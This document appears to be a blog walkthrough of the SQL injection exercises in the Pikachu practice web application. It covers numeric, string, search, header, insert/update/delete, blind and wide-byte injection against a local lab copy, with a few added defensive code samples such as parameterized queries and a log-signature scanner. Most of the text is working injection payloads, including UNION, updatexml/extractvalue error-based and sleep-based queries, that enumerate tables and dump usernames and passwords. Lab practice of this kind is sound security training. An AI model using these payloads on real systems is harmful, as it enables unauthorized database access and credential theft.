Pikachu - SQL Inject (SQL injection)

In the OWASP Top 10 rankings, injection has long held first place among the most dangerous vulnerability classes, and among injection vulnerabilities, database (SQL) injection bears the brunt.
A serious SQL injection vulnerability can directly lead to a company going bankrupt!
SQL injection vulnerabilities arise mainly during data exchange: data passed from the front end to the back end is not strictly validated, so the incoming "data" is concatenated onto the SQL statement and executed as part of it. The result is damage to the database (it gets dumped, deleted, or even the entire server is compromised).

When writing code, SQL injection is usually prevented from the following angles:
1. Filter the variables that are passed into SQL statements and do not allow dangerous characters through;
2. Use parameterization (Parameterized Query or Parameterized Statement);
3. Many ORM frameworks automatically use parameterization to solve the injection problem, but they also provide a "concatenation" mode, so be careful when using it!
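As an added example (not from the original post and not Pikachu's own code), the concatenation pattern that causes the problem next to the parameterized replacement from strategies 1 and 2; the in-memory SQLite database and its rows are constructed here to stand in for the training app's users table:

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for the training app's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "hash-of-admin"), (2, "kobe", "hash-of-kobe")])
    return db

def lookup_concat(db, user_id):
    # Vulnerable: the request parameter is spliced into the statement text, so
    # "1 and 1=2" or "0 union select ..." is executed as SQL instead of compared as data.
    sql = f"SELECT id, username FROM users WHERE id = {user_id}"
    return db.execute(sql).fetchall()

def lookup_param(db, user_id):
    # Hardened: reject anything that is not a plain integer (strategy 1), then bind
    # the value as a query parameter so it can never become SQL text (strategy 2).
    text = str(user_id).strip()
    if not re.fullmatch(r"[0-9]+", text):
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username FROM users WHERE id = ?"
    return db.execute(sql, (int(text),)).fetchall()

def rejects(db, user_id):
    # True when the hardened lookup refuses the value.
    try:
        lookup_param(db, user_id)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 and 1=1", "1 and 1=2", "0 union select 1, password from users"):
        print("concat   ", repr(probe), "->", lookup_concat(db, probe))
        print("parameter", repr(probe), "-> rejected" if rejects(db, probe) else lookup_param(db, probe))
```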

Numeric injection (POST)

Method one: manual UNION query injection

1. Capture the request and send it to the Repeater module; after id=1 append and 1=1 and and 1=2 respectively.

and 1=1: no error

and 1=2: error

2. Find the number of columns: order by 2 gives no error, order by 3 gives an error, so there are only two columns.

3. Use a UNION query to find the displayed positions, with id set to a non-existent value: id=0 union select 1,2

4. Dump the database name:

id=0 union select 1,database()

5. Dump the table names:

id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

6. The administrator's account and password are probably in the users table; dump the column names:

id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'

7. Dump the values:

id=0 union select 1,group_concat(username,0x3a,password) from users

Method two: manual error-based injection

1. Dump the database name, with id set to a valid value: id=1 and extractvalue(1,concat(0x7e,(select database())))

2. Dump the table names:

id=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))

3. Dump the column names:

id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))

4. The output is truncated; use not in to dump the names that were not shown.

5. Dump the values:

id=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))); as before, values that were not shown can be dumped with not in.

Method three: automated injection with sqlmap

Not covered in detail here.


Character injection (GET)

1. Single-quote test: error

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1'&submit=%E6%9F%A5%E8%AF%A2

2. Add a comment marker: no error, which confirms a single-quote character-type injection.

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' --+&submit=%E6%9F%A5%E8%AF%A2

3. Find the number of columns: order by 2 gives no error, order by 3 gives an error, so there are only two columns.

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' order by 2 --+&submit=%E6%9F%A5%E8%AF%A2

4. Find the displayed positions:

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,2 --+&submit=%E6%9F%A5%E8%AF%A2

5. Dump the table names:

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2

6. Dump the columns:

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%9F%A5%E8%AF%A2

7. Dump the values:

http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=1' union select 1,group_concat(username,0x3a,password) from users --+&submit=%E6%9F%A5%E8%AF%A2

Methods two and three from numeric injection (POST) also apply to this exercise.


Search injection

1. Principle analysis

select username,id,email from member where username like '%$name%'

This SQL statement searches the member table for usernames matching the name value entered by the user, but if you enter 'and 1=1 and '%'=' it becomes

select username,id,email from member where username like '%$name'and 1=1 and '%'='%'

· How to recognise search-type injection:

1 Search for keywords'; if it errors, there is a 90% chance the vulnerability exists;
2 Search for keywords%; if that errors as well, there is a 95% chance the vulnerability exists;
3 Search for keywords% 'and 1=1 and '%'=' (this does the same job as and 1=1 in ordinary SQL injection) and observe the response;
4 Search for keywords% 'and 1=2 and '%'=' (this does the same job as and 1=2 in ordinary SQL injection) and observe the response;
5 Compare the two responses to decide whether the search box is injectable.

· The following can also be used for testing

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

 

2. Check whether injection is possible; try constructing

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%'  &submit=%E6%90%9C%E7%B4%A2 : error

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' --+&submit=%E6%90%9C%E7%B4%A2 : no error

3. Find the number of columns: order by 3 gives no error

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' order by 4 --+&submit=%E6%90%9C%E7%B4%A2

4. Find the displayed positions:

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,3 --+&submit=%E6%90%9C%E7%B4%A2

5. Dump the table names:

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%90%9C%E7%B4%A2

6. Dump the column names:

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%90%9C%E7%B4%A2

7. Dump the values:

http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=0%' union select 1,2,group_concat(username,0x3a,password) from users --+&submit=%E6%90%9C%E7%B4%A2

xx-type injection

1. First test with a single quote:

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0' &submit=%E6%9F%A5%E8%AF%A2#

2. Given this error, try constructing

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') &submit=%E6%9F%A5%E8%AF%A2# : error

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') --+&submit=%E6%9F%A5%E8%AF%A2# : no error

3. Determine the number of columns: order by 2 gives no error

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') order by 3--+&submit=%E6%9F%A5%E8%AF%A2#

4. Find the displayed positions:

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,2 --+&submit=%E6%9F%A5%E8%AF%A2#

5. Dump the table names:

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=%E6%9F%A5%E8%AF%A2#

6. Dump the column names:

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=%E6%9F%A5%E8%AF%A2#

7. Dump the values:

http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0') union select 1,group_concat(username,0x3a,password) from users --+&submit=%E6%9F%A5%E8%AF%A2#

insert/update injection

1. Test with a single quote.

2. Injection exists: the leading single quote closes the quote before it and the trailing single quote closes the quote after it, so our code can go between the two or's. The error-based payload can be inserted directly to dump the database name:

' or updatexml(1,concat(0x7e,(database())),0) or '

3. Likewise, dump the tables:

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or '

4. Dump the column names:

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0) or '

5. Dump the values:

' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)),0) or '

delete injection

1. Delete a message while capturing the request and send it to the Repeater module; the closing can be done on the id in Repeater. Since the id it passes is numeric, we don't need a single quote to close it.

Because this parameter is submitted in the URL, the payload must be URL-encoded in Burp.

2. Dump the database name:

id=63+or+updatexml(1,concat(0x7e,(select+database())),0)

3. Dump the table names:

id=63+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase())),0)

4. Dump the column names:

id=63+or+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_name%3d'users')),0)

5. Dump the values:

id=63+or+updatexml(1,concat(0x7e,(select+group_concat(username,0x3a,password)+from+users)),0)

HTTP header injection

1. Enter some data and observe.

2. Capture the request and send it to the Repeater module; delete the content of the Accept header and add a single quote to test. It errors, which suggests injection may be possible.

3. Construct the payload and dump the database name:

User-Agent: ' or updatexml(1,concat(0x7e,(select database())),0) or '

4. Dump the table names:

User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),0) or '

5. Dump the column names:

User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0) or '

6. Dump the values:

User-Agent: ' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)),0) or '

Blind injection (based on boolean)

1. Boolean-based blind injection; test with:

kobe' and 1=1#

2. Guess byte by byte:

Error: kobe' and ascii(substr(database(),1,1))>112#

No error: kobe' and ascii(substr(database(),1,1))=112#

3. Guessing the database name, table names, column names and values byte by byte like this is too tedious; a tool is recommended.

Blind injection (based on time)

1. Time-based blind injection; test: the response takes roughly five seconds, so injection exists.

kobe' and sleep(5)#

2. Guess the database name:

Instant response: kobe' and if((substr(database(),1,1))='s',sleep(5),null)#

Five-second response: kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

So the first letter of the database name is p.

3. Continue guessing; too tedious, a tool is recommended.
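From the defender's side, an added example (not from the original post): a small scanner that URL-decodes the query string of access-log lines and flags the payload families used throughout this walkthrough, treating a slow response together with sleep( as a time-based probe. The log lines are constructed, and the trailing response-time field is an assumed extension of the combined log format.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Payload families seen in this walkthrough; matched on the decoded, lowercased query.
SIGNATURES = {
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "error_based": re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
    "boolean": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "time_based": re.compile(r"\bsleep\s*\("),
    "column_count": re.compile(r"\border\s+by\s+\d+"),
    "wide_byte": re.compile("\ufffd'"),  # lone lead byte such as %d5 right before a quote
}

# Combined log format with an assumed trailing response-time field (seconds).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+(?: (?P<rt>[\d.]+))?')

def normalise(target):
    # Decode %xx and + once (undecodable bytes become U+FFFD), collapse whitespace, lowercase.
    query = unquote_plus(urlsplit(target).query, errors="replace")
    return re.sub(r"\s+", " ", query).lower()

def scan_line(line, slow_seconds=4.0):
    m = LOG_RE.match(line)
    if not m:
        return None
    text = normalise(m["target"])
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(text))
    if "time_based" in hits and m["rt"] and float(m["rt"]) >= slow_seconds:
        hits.append("slow_response")
    return {"ip": m["ip"], "path": urlsplit(m["target"]).path, "hits": hits} if hits else None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample lines modelled on the requests in this walkthrough.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Feb/2020:10:00:00 +0800] "GET /pikachu/vul/sqli/sqli_str.php?name=kobe&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 1532 0.012',
    '127.0.0.1 - - [10/Feb/2020:10:00:05 +0800] "GET /pikachu/vul/sqli/sqli_str.php?name=1%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()+--+&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 1610 0.015',
    '127.0.0.1 - - [10/Feb/2020:10:00:09 +0800] "GET /pikachu/vul/sqli/sqli_search.php?name=kobe%27+and+sleep(5)%23&submit=%E6%90%9C%E7%B4%A2 HTTP/1.1" 200 1480 5.004',
    '127.0.0.1 - - [10/Feb/2020:10:00:15 +0800] "GET /pikachu/vul/sqli/sqli_str.php?name=1%d5%27+union+select+1,2+--+&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 1500 0.011',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```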

 


 

Wide-byte injection

1. With magic_quotes_gpc=On, a single quote ' in a submitted parameter is automatically escaped to \', which defeats many injection attacks.

GBK double-byte encoding: one Chinese character is represented by two bytes; the lead byte is in 0x81-0xFE and the trail byte in 0x40-0xFE (except 0x7F), a range that happens to cover 0x5C, the code of the escape character \.

0xD5 0x5C therefore corresponds to a single Chinese character. URL encoding represents a character as a percent sign followed by its hex code, so %d5%5c URL-decodes to that character.
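An added illustration (not from the original post) of the mechanism just described: escaping byte by byte and then decoding as GBK lets 0xD5 swallow the inserted 0x5C backslash, while decoding first and escaping afterwards keeps the quote escaped. The input bytes are constructed; in real PHP code the charset-aware route is to set the connection charset through the driver (mysqli_set_charset or the charset in the PDO DSN) and to use prepared statements.

```python
import re

def addslashes(text):
    # PHP-style addslashes: put a backslash before ', " and \ .
    return re.sub(r"(['\"\\])", r"\\\1", text)

def escape_then_decode(raw):
    # Byte-blind order (what magic_quotes_gpc did): escape each byte as if it were a
    # character, then hand the bytes to a connection that decodes them as GBK.
    # 0xD5 followed by the inserted 0x5C is a valid GBK pair, so the backslash is eaten.
    escaped = addslashes(raw.decode("latin-1")).encode("latin-1")
    return escaped.decode("gbk")

def decode_then_escape(raw):
    # Charset-aware order: decode the input as GBK first (a lone lead byte such as 0xD5
    # directly before a quote is malformed and raises), then escape whole characters.
    return addslashes(raw.decode("gbk"))

def is_rejected(raw):
    # True when the charset-aware path refuses the input as malformed GBK.
    try:
        decode_then_escape(raw)
        return False
    except UnicodeDecodeError:
        return True

def has_unescaped_quote(fragment):
    # True if some ' is preceded by an even number of backslashes (zero included).
    return re.search(r"(?<!\\)(?:\\\\)*'", fragment) is not None

if __name__ == "__main__":
    probe = b"1\xd5'"  # constructed: the bytes that  name=1%d5'  arrive as
    print(repr(escape_then_decode(probe)), "live quote:", has_unescaped_quote(escape_then_decode(probe)))
    print("charset-aware path rejects it:", is_rejected(probe))
    print(repr(decode_then_escape("kobe'".encode("gbk"))))
```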

 

2. Enter %d5' : error, so wide-byte injection exists.

3. Find the number of columns: order by 2 gives no error, order by 3 gives an error, so there are two columns.

4. Find the displayed positions:

name=1%d5' union select 1,2 --+

5. Dump the table names:

name=1%d5' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

6. Dump the column names; table_name='users' also contains single quotes, so users must be hex-encoded as 0x7573657273:

name=1%d5' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

7. Dump the values:

name=1%d5' union select 1,group_concat(username,0x3a,password) from users --+


Origin: www.cnblogs.com/joker-vip/p/12355095.html